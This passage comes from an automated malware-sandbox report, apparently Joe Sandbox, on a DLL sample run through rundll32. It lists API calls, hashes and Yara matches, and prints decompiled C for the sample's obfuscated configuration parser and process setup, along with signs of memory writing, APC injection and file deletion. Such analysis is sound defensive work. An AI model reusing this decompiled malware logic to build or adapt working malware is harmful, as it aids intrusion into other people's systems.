                            • RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 04F69AB7
                            • DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 04F69AC2
                            • FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 04F69AD5
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
                            • String ID:
                            • API String ID: 499515686-3916222277
                            • Opcode ID: da7b3e4d17b98703d6a5a7d81680f016dabb7a79fed23211fbd8d946eb55cef5
                            • Instruction ID: 092674a7016258c60abd9ae7c69bb1f49840ed5bbab18bf0d1006ab9c0ba323b
                            • Opcode Fuzzy Hash: da7b3e4d17b98703d6a5a7d81680f016dabb7a79fed23211fbd8d946eb55cef5
                            • Instruction Fuzzy Hash: C6412FB1D0020AFFDF119FA4DD89EAE7BB8FF00314F104559E512AA190EBB4AA45DB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 04F6EC1B
                            • RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 04F6ECD3
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 04F6EC69
                            • GetProcAddress.KERNEL32(00000000,?), ref: 04F6EC82
                            • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 04F6ECA1
                            • FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 04F6ECB3
                            • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 04F6ECBB
                            Strings
                            • Software\Microsoft\WAB\DLLPath, xrefs: 04F6EC0C
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                            • String ID: Software\Microsoft\WAB\DLLPath
                            • API String ID: 1628847533-3156921957
                            • Opcode ID: 33e3c7a2d178c4de759bc9d941c23b6bb9ff924538352ac0fa6f66b2f43e7f59
                            • Instruction ID: af9b86c3fe55c6972bffd0096206263e52d3c7c34f51a8391d229b66752b1a6a
                            • Opcode Fuzzy Hash: 33e3c7a2d178c4de759bc9d941c23b6bb9ff924538352ac0fa6f66b2f43e7f59
                            • Instruction Fuzzy Hash: A5216277A00518FFDB11AFA8ED88CBEBF7DEB84711B100165F802AB210E6756E42DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E04A11645(void* __ebx, int* __ecx, void* __edi, void* __esi) {
                            				int _v8;
                            				void* _v12;
                            				void* _v16;
                            				signed int _t28;
                            				signed int _t33;
                            				signed int _t39;
                            				char* _t45;
                            				char* _t46;
                            				char* _t47;
                            				char* _t48;
                            				char* _t49;
                            				char* _t50;
                            				void* _t51;
                            				void* _t52;
                            				void* _t53;
                            				intOrPtr _t54;
                            				void* _t56;
                            				intOrPtr _t57;
                            				intOrPtr _t58;
                            				signed int _t61;
                            				intOrPtr _t64;
                            				signed int _t65;
                            				signed int _t70;
                            				void* _t72;
                            				void* _t73;
                            				signed int _t75;
                            				signed int _t78;
                            				signed int _t82;
                            				signed int _t86;
                            				signed int _t90;
                            				signed int _t94;
                            				signed int _t98;
                            				void* _t101;
                            				void* _t102;
                            				void* _t115;
                            				void* _t118;
                            				intOrPtr _t121;
                            
                            				_t118 = __esi;
                            				_t115 = __edi;
                            				_t104 = __ecx;
                            				_t101 = __ebx;
                            				_t28 =  *0x4a1a344; // 0x69b25f44
                            				if(E04A17780( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                            					 *0x4a1a378 = _v8;
                            				}
                            				_t33 =  *0x4a1a344; // 0x69b25f44
                            				if(E04A17780( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                            					_v12 = 2;
                            					L69:
                            					return _v12;
                            				}
                            				_t39 =  *0x4a1a344; // 0x69b25f44
                            				_push(_t115);
                            				if(E04A17780( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                            					L67:
                            					HeapFree( *0x4a1a2d8, 0, _v16);
                            					goto L69;
                            				} else {
                            					_push(_t101);
                            					_t102 = _v12;
                            					if(_t102 == 0) {
                            						_t45 = 0;
                            					} else {
                            						_t98 =  *0x4a1a344; // 0x69b25f44
                            						_t45 = E04A15450(_t104, _t102, _t98 ^ 0x7895433b);
                            					}
                            					_push(_t118);
                            					if(_t45 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                            							 *0x4a1a2e0 = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t46 = 0;
                            					} else {
                            						_t94 =  *0x4a1a344; // 0x69b25f44
                            						_t46 = E04A15450(_t104, _t102, _t94 ^ 0x219b08c7);
                            					}
                            					if(_t46 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                            							 *0x4a1a2e4 = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t47 = 0;
                            					} else {
                            						_t90 =  *0x4a1a344; // 0x69b25f44
                            						_t47 = E04A15450(_t104, _t102, _t90 ^ 0x31fc0661);
                            					}
                            					if(_t47 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                            							 *0x4a1a2e8 = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t48 = 0;
                            					} else {
                            						_t86 =  *0x4a1a344; // 0x69b25f44
                            						_t48 = E04A15450(_t104, _t102, _t86 ^ 0x0cd926ce);
                            					}
                            					if(_t48 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                            							 *0x4a1a004 = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t49 = 0;
                            					} else {
                            						_t82 =  *0x4a1a344; // 0x69b25f44
                            						_t49 = E04A15450(_t104, _t102, _t82 ^ 0x3cd8b2cb);
                            					}
                            					if(_t49 != 0) {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                            							 *0x4a1a02c = _v8;
                            						}
                            					}
                            					if(_t102 == 0) {
                            						_t50 = 0;
                            					} else {
                            						_t78 =  *0x4a1a344; // 0x69b25f44
                            						_t50 = E04A15450(_t104, _t102, _t78 ^ 0x2878b929);
                            					}
                            					if(_t50 == 0) {
                            						L41:
                            						 *0x4a1a2ec = 5;
                            						goto L42;
                            					} else {
                            						_t104 =  &_v8;
                            						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                            							goto L41;
                            						} else {
                            							L42:
                            							if(_t102 == 0) {
                            								_t51 = 0;
                            							} else {
                            								_t75 =  *0x4a1a344; // 0x69b25f44
                            								_t51 = E04A15450(_t104, _t102, _t75 ^ 0x261a367a);
                            							}
                            							if(_t51 != 0) {
                            								_push(_t51);
                            								_t72 = 0x10;
                            								_t73 = E04A12FBC(_t72);
                            								if(_t73 != 0) {
                            									_push(_t73);
                            									E04A172C7();
                            								}
                            							}
                            							if(_t102 == 0) {
                            								_t52 = 0;
                            							} else {
                            								_t70 =  *0x4a1a344; // 0x69b25f44
                            								_t52 = E04A15450(_t104, _t102, _t70 ^ 0xb9d404b2);
                            							}
                            							if(_t52 != 0 && E04A12FBC(0, _t52) != 0) {
                            								_t121 =  *0x4a1a3cc; // 0x55395b0
                            								E04A1765B(_t121 + 4, _t68);
                            							}
                            							if(_t102 == 0) {
                            								_t53 = 0;
                            							} else {
                            								_t65 =  *0x4a1a344; // 0x69b25f44
                            								_t53 = E04A15450(_t104, _t102, _t65 ^ 0x3df17130);
                            							}
                            							if(_t53 == 0) {
                            								L59:
                            								_t54 =  *0x4a1a348; // 0xb1d5a8
                            								_t22 = _t54 + 0x4a1b252; // 0x616d692f
                            								 *0x4a1a374 = _t22;
                            								goto L60;
                            							} else {
                            								_t64 = E04A12FBC(0, _t53);
                            								 *0x4a1a374 = _t64;
                            								if(_t64 != 0) {
                            									L60:
                            									if(_t102 == 0) {
                            										_t56 = 0;
                            									} else {
                            										_t61 =  *0x4a1a344; // 0x69b25f44
                            										_t56 = E04A15450(_t104, _t102, _t61 ^ 0xd2079859);
                            									}
                            									if(_t56 == 0) {
                            										_t57 =  *0x4a1a348; // 0xb1d5a8
                            										_t23 = _t57 + 0x4a1b79e; // 0x6976612e
                            										_t58 = _t23;
                            									} else {
                            										_t58 = E04A12FBC(0, _t56);
                            									}
                            									 *0x4a1a3e0 = _t58;
                            									HeapFree( *0x4a1a2d8, 0, _t102);
                            									_v12 = 0;
                            									goto L67;
                            								}
                            								goto L59;
                            							}
                            						}
                            					}
                            				}
                            			}

                            APIs
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04A1A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04A116EA
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04A1A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04A1171C
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04A1A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04A1174E
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04A1A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04A11780
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04A1A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04A117B2
                            • StrToIntExA.SHLWAPI(00000000,00000000,?,04A1A00C,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?), ref: 04A117E4
                            • HeapFree.KERNEL32(00000000,?,00000008,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04A118E3
                            • HeapFree.KERNEL32(00000000,?,?,?,69B25F44,00000005,?,?,69B25F44,?,?,69B25F44,?,?), ref: 04A118F7
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: f1f321efa1dc3e14bab06c5e9d81083f1d6c2d08d5f9ea894df2256277e8ad29
                            • Instruction ID: cc1bcce3cb945c8e9e4c37fa1ed124b4a214d4f8df9e0502c55306257f0aadba
                            • Opcode Fuzzy Hash: f1f321efa1dc3e14bab06c5e9d81083f1d6c2d08d5f9ea894df2256277e8ad29
                            • Instruction Fuzzy Hash: 1081A0B8B11214ABDB11EBB4DA84E9B73EDEB9C6447284D25E201D7230F639FD418B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,04F62028,?), ref: 04F6867A
                              • Part of subcall function 04F68669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,04F62028,?), ref: 04F68697
                            • FreeLibrary.KERNEL32(?), ref: 04F666F8
                              • Part of subcall function 04F7AFC2: lstrlenW.KERNEL32(?,00000000,?,?,?,04F6663D,?,?), ref: 04F7AFCF
                              • Part of subcall function 04F7AFC2: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,04F6663D,?,?), ref: 04F7AFF8
                              • Part of subcall function 04F7AFC2: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04F7B018
                              • Part of subcall function 04F7AFC2: lstrcpyW.KERNEL32(-00000002,?), ref: 04F7B034
                              • Part of subcall function 04F7AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,04F6663D,?,?), ref: 04F7B040
                              • Part of subcall function 04F7AFC2: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,04F6663D,?,?), ref: 04F7B043
                              • Part of subcall function 04F7AFC2: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,04F6663D,?,?), ref: 04F7B04F
                              • Part of subcall function 04F7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 04F7B06C
                              • Part of subcall function 04F7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 04F7B086
                              • Part of subcall function 04F7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 04F7B09C
                              • Part of subcall function 04F7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 04F7B0B2
                              • Part of subcall function 04F7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 04F7B0C8
                              • Part of subcall function 04F7AFC2: GetProcAddress.KERNEL32(00000000,?), ref: 04F7B0DE
                            • FindFirstFileW.KERNEL32(?,?,?,?), ref: 04F6664E
                            • lstrlenW.KERNEL32(?), ref: 04F6666A
                            • lstrlenW.KERNEL32(?), ref: 04F66682
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • lstrcpyW.KERNEL32(00000000,?), ref: 04F6669B
                            • lstrcpyW.KERNEL32(00000002), ref: 04F666B0
                              • Part of subcall function 04F81C9B: lstrlenW.KERNEL32(?,00000000,761F8250,761B69A0,?,?,?,04F666C0,?,00000000,?), ref: 04F81CAB
                              • Part of subcall function 04F81C9B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,04F666C0,?,00000000,?), ref: 04F81CCD
                              • Part of subcall function 04F81C9B: lstrcpyW.KERNEL32(00000000,?), ref: 04F81CF9
                              • Part of subcall function 04F81C9B: lstrcatW.KERNEL32(00000000,?), ref: 04F81D0C
                            • FindNextFileW.KERNEL32(?,00000010), ref: 04F666D8
                            • FindClose.KERNEL32(00000002), ref: 04F666E6
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
                            • String ID:
                            • API String ID: 1209511739-0
                            • Opcode ID: cd4e31c471b134ce8adf4acebfcccbbc1616463c2730681b983148e08b0305f3
                            • Instruction ID: 06df6e07017399d7910ffe913997c915961a117d904cbd3f11fc5d6d9415f32f
                            • Opcode Fuzzy Hash: cd4e31c471b134ce8adf4acebfcccbbc1616463c2730681b983148e08b0305f3
                            • Instruction Fuzzy Hash: 84415E71908355AFE711EF60EC48A6FBBE8FB84708F04092EF585D6150DB35E90ACB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.NTDLL ref: 04F7EAE7
                              • Part of subcall function 04F77950: NtAllocateVirtualMemory.NTDLL(04F7EB0F,00000000,00000000,04F7EB0F,00003000,00000040), ref: 04F77981
                              • Part of subcall function 04F77950: RtlNtStatusToDosError.NTDLL(00000000), ref: 04F77988
                              • Part of subcall function 04F77950: SetLastError.KERNEL32(00000000), ref: 04F7798F
                            • GetLastError.KERNEL32(?,00000318,00000008), ref: 04F7EBF7
                              • Part of subcall function 04F636BB: RtlNtStatusToDosError.NTDLL(00000000), ref: 04F636D3
                            • memcpy.NTDLL(00000218,04F838A0,00000100,?,00010003,?,?,00000318,00000008), ref: 04F7EB76
                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04F7EBD0
                            Strings
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
                            • String ID:
                            • API String ID: 2966525677-3916222277
                            • Opcode ID: d589a2fcdaff294760617cd112f1517d41a56c6be0fa9c2cd5697ce5bd0b5612
                            • Instruction ID: 6d762be8d3e262cc1e6e99ec492a2b2ee78906e6a79ceece6b67b81cc1935b0e
                            • Opcode Fuzzy Hash: d589a2fcdaff294760617cd112f1517d41a56c6be0fa9c2cd5697ce5bd0b5612
                            • Instruction Fuzzy Hash: 6A314175901209EBEB20DF68DD89AAABBB8EB04314F1045AFE556D7240E738FE45CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$memcpy
                            • String ID:
                            • API String ID: 368790112-0
                            • Opcode ID: 8bc67b7684c08cf9e2f10b0909ad597bf476c9827be85f4ba29ce55c157ac1e8
                            • Instruction ID: 1b88aa227635df656fd10770b256b5b48e185e1a1693cb52d332966dafe8bda0
                            • Opcode Fuzzy Hash: 8bc67b7684c08cf9e2f10b0909ad597bf476c9827be85f4ba29ce55c157ac1e8
                            • Instruction Fuzzy Hash: 23F1E070900B99CFDB31CF68C9846AABBF4BF41304F544D6ED5E796682D239BA46CB10
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E04A16D78(intOrPtr _a4) {
                            				void* _t2;
                            				unsigned int _t4;
                            				void* _t5;
                            				long _t6;
                            				void* _t7;
                            				void* _t15;
                            
                            				_t2 = CreateEventA(0, 1, 0, 0);
                            				 *0x4a1a30c = _t2;
                            				if(_t2 == 0) {
                            					return GetLastError();
                            				}
                            				_t4 = GetVersion();
                            				if(_t4 != 5) {
                            					L4:
                            					if(_t15 <= 0) {
                            						_t5 = 0x32;
                            						return _t5;
                            					}
                            					L5:
                            					 *0x4a1a2fc = _t4;
                            					_t6 = GetCurrentProcessId();
                            					 *0x4a1a2f8 = _t6;
                            					 *0x4a1a304 = _a4;
                            					_t7 = OpenProcess(0x10047a, 0, _t6);
                            					 *0x4a1a2f4 = _t7;
                            					if(_t7 == 0) {
                            						 *0x4a1a2f4 =  *0x4a1a2f4 | 0xffffffff;
                            					}
                            					return 0;
                            				}
                            				if(_t4 >> 8 > 0) {
                            					goto L5;
                            				}
                            				_t15 = _t4 - _t4;
                            				goto L4;
                            			}

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04A11D07,?), ref: 04A16D80
                            • GetVersion.KERNEL32 ref: 04A16D8F
                            • GetCurrentProcessId.KERNEL32 ref: 04A16DAB
                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04A16DC8
                            • GetLastError.KERNEL32 ref: 04A16DE7
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                            • String ID:
                            • API String ID: 2270775618-0
                            • Opcode ID: 3710e5065df99efe3481b3ba5e611c5620583d351a46ff07b93bcd889e2b61eb
                            • Instruction ID: 92d8043d1f86e4e9b3b9b157948dfaef82a1abf6bf25286d6180ca5494fa909a
                            • Opcode Fuzzy Hash: 3710e5065df99efe3481b3ba5e611c5620583d351a46ff07b93bcd889e2b61eb
                            • Instruction Fuzzy Hash: 0CF0C2B47417029BEB208F24AA29B253BB4EB60701F104019E512CE1F0D77DA842CF15
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 04F6D7D0
                            • lstrlenW.KERNEL32(?), ref: 04F6D7DE
                            • NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 04F6D809
                            • lstrcpyW.KERNEL32(00000006,00000000), ref: 04F6D837
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Query$lstrcpylstrlen
                            • String ID:
                            • API String ID: 3961825720-0
                            • Opcode ID: 7507ebb71398ed1bb7f1fc1fbbadfc3f060615f69ce508285d78b2d819ea9f60
                            • Instruction ID: 64f95e375e9706928dcc448b32ac88f4a12bfa0500b5c4b5c8336de7fa989920
                            • Opcode Fuzzy Hash: 7507ebb71398ed1bb7f1fc1fbbadfc3f060615f69ce508285d78b2d819ea9f60
                            • Instruction Fuzzy Hash: 2E410E71A00209FFEF119FA4DD88EAE7BB8EF44314F144069F906AB150D775EA12DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,04F8A1E8,00000001), ref: 04F78215
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78260
                              • Part of subcall function 04F773AA: CreateThread.KERNEL32(00000000,00000000,00000000,04F7893A,04F8A174,04F80998), ref: 04F773C1
                              • Part of subcall function 04F773AA: QueueUserAPC.KERNEL32(04F7893A,00000000,?,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773D6
                              • Part of subcall function 04F773AA: GetLastError.KERNEL32(00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773E1
                              • Part of subcall function 04F773AA: TerminateThread.KERNEL32(00000000,00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773EB
                              • Part of subcall function 04F773AA: CloseHandle.KERNEL32(00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773F2
                              • Part of subcall function 04F773AA: SetLastError.KERNEL32(00000000,?,04F7893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 04F773FB
                            • GetLastError.KERNEL32(04F71FE9,00000000,00000000,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78248
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,04F69100,?,?,?,?,?), ref: 04F78258
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                            • String ID:
                            • API String ID: 1700061692-0
                            • Opcode ID: 7864f7cf9d16c53906cd24807d4d9b3d953d2b4c5edbcb7ae6b30e597d96ea82
                            • Instruction ID: ee63e17bfd453a5f3be3ed902a12af78856027cf475ab5e199a27ebd59110615
                            • Opcode Fuzzy Hash: 7864f7cf9d16c53906cd24807d4d9b3d953d2b4c5edbcb7ae6b30e597d96ea82
                            • Instruction Fuzzy Hash: 79F0C871745605BFE3112AA8BC8CE773758EF85375B14023AFA25DA2C0DA785C07CAB0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 04F6B7E9
                            • GetLastError.KERNEL32(?,?,?,0000001C,?), ref: 04F6B829
                              • Part of subcall function 04F75312: NtWriteVirtualMemory.NTDLL(?,00000004,00000000,00000000,?,761B6780,?,04F7907F,?,00000004,00000000,00000004,?), ref: 04F75330
                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04F6B832
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Error$InformationLastMemoryQueryStatusThreadVirtualWrite
                            • String ID:
                            • API String ID: 4036914670-0
                            • Opcode ID: 74325520984d724682189464f07072ba3563ff0b9fc5147b0de0dbbdf0a358ca
                            • Instruction ID: cf5cffab13cd7cf0ad98bec4916c224455d4212ce49147e01932c8e6d310734c
                            • Opcode Fuzzy Hash: 74325520984d724682189464f07072ba3563ff0b9fc5147b0de0dbbdf0a358ca
                            • Instruction Fuzzy Hash: 8301FB75900108FFEF10AAE5ED04DEEBBBDEB84700F540025FA45E6050E775E906EB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • NtQuerySystemInformation.NTDLL(00000005,00000000,00010000,00010000), ref: 04F7385A
                            • RtlNtStatusToDosError.NTDLL(C000009A), ref: 04F73891
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorFreeHeapInformationQueryStatusSystem
                            • String ID:
                            • API String ID: 2533303245-0
                            • Opcode ID: c76b607580fe8186b88431b5e186cea049343dc7a9af70f5e5f2419374529e9d
                            • Instruction ID: cd45cb8c1ed0e871cdff58351c8ff5637c8529633bb3b1a46d0620f7895a35da
                            • Opcode Fuzzy Hash: c76b607580fe8186b88431b5e186cea049343dc7a9af70f5e5f2419374529e9d
                            • Instruction Fuzzy Hash: 4B01D673D02134BBD7215A548C08AAFBA69DF85B50F16012AED0167100E77CAE02E6D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.NTDLL ref: 04F664E3
                            • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 04F664FB
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InformationProcessQuerymemset
                            • String ID:
                            • API String ID: 2040988606-0
                            • Opcode ID: f5fa336e8ccad3b0f18d91065db32632baceccf324fff45850d4ae77aa86124f
                            • Instruction ID: 34fa41b08945da0cecc3eb06b77e841221e34268c067b9097817424086ae1f08
                            • Opcode Fuzzy Hash: f5fa336e8ccad3b0f18d91065db32632baceccf324fff45850d4ae77aa86124f
                            • Instruction Fuzzy Hash: 2EF0127690022CBBEB10DA91DC49FDEBFBCEB14744F404061AE08E6191E774EB55CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlNtStatusToDosError.NTDLL(C0000002), ref: 04F7524D
                            • SetLastError.KERNEL32(00000000,?,04F6C670,?,00000000,00000000,00000004,?,00000000,00000000,761B4EE0,00000000), ref: 04F75254
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Error$LastStatus
                            • String ID:
                            • API String ID: 4076355890-0
                            • Opcode ID: 0878d7adca3a7da85a3845bf04252eb5b410409a2cbabde317531b64fc76da40
                            • Instruction ID: f5c4c99ff87ebc233d92fe6501f73b20d8b6024f3e0adbbb6ba9afe42bf98ba9
                            • Opcode Fuzzy Hash: 0878d7adca3a7da85a3845bf04252eb5b410409a2cbabde317531b64fc76da40
                            • Instruction Fuzzy Hash: 02E0923260011DBBDF015EE8AC05DAE7F59EB4C751B009015FF15D6520D739DD22DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • memset.NTDLL ref: 04F80327
                            • memset.NTDLL ref: 04F80336
